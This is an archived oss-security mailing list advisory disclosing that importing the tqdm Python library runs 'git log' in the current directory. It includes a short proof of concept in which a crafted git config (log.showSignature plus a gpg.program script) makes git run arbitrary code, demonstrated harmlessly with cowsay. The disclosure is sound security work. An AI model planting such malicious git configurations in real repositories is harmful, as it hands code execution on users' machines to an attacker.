Date: Sun, 25 Dec 2016 21:47:43 +0100 From: Jakub Wilk <jwilk@...lk.net> To: oss-security@...ts.openwall.com Subject: tqdm: insecure use of git tqdm <https://github.com/tqdm/tqdm> is a "fast, extensible progress bar for Python". When you import tqdm, the tqdm._version module executes the following command: git log -n 1 --oneline This was meant to check if the user is running a pre-release version of tqdm. But cwd might be a part of an unrelated git repository, possibly a malicious one. At least with git 2.10 or later, it's possible to craft a repo in which "git log" executes arbitrary code: $ tail -n4 /tmp/.git/config [log] showSignature = true [gpg] program = /tmp/moogpg $ tail -n4 /tmp/moogpg #!/bin/sh exec > /dev/tty 2>&1 cowsay pwned sleep 9999 $ cd /tmp $ pydoc tqdm _______ < pwned > ------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || Upstream bug report: https://github.com/tqdm/tqdm/issues/328 Affected versions: v4.4.1 and later. -- Jakub Wilk
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Powered by Openwall GNU/*/Linux - Powered by OpenVZ